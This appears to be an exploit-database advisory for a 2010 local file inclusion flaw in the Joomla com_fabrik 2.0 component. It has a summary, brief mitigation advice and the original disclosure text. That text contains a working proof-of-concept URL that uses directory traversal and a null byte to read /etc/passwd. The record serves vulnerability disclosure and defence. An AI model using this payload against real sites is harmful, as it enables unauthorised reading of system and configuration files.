Joomla Component Fabrik Local File Inclusion Vulnerability

vendor:

com_fabrik

by:

AntiSecurity

8,8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_fabrik

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:fabrikar:com_fabrik

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Fabrik Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the com_fabrik component of Joomla. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a maliciously crafted parameter which can be used to include arbitrary files from the server. This can be used to gain access to sensitive information such as system files, configuration files, and source code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated. Additionally, it is recommended to keep all software up to date with the latest security patches.

Source

Exploit-DB raw data:

============================================================================================================


  [o] Joomla Component Fabrik Local File Inclusion Vulnerability
 
       Software : com_fabrik version 2.0
       Vendor   : http://fabrikar.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_fabrik&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00


============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


============================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia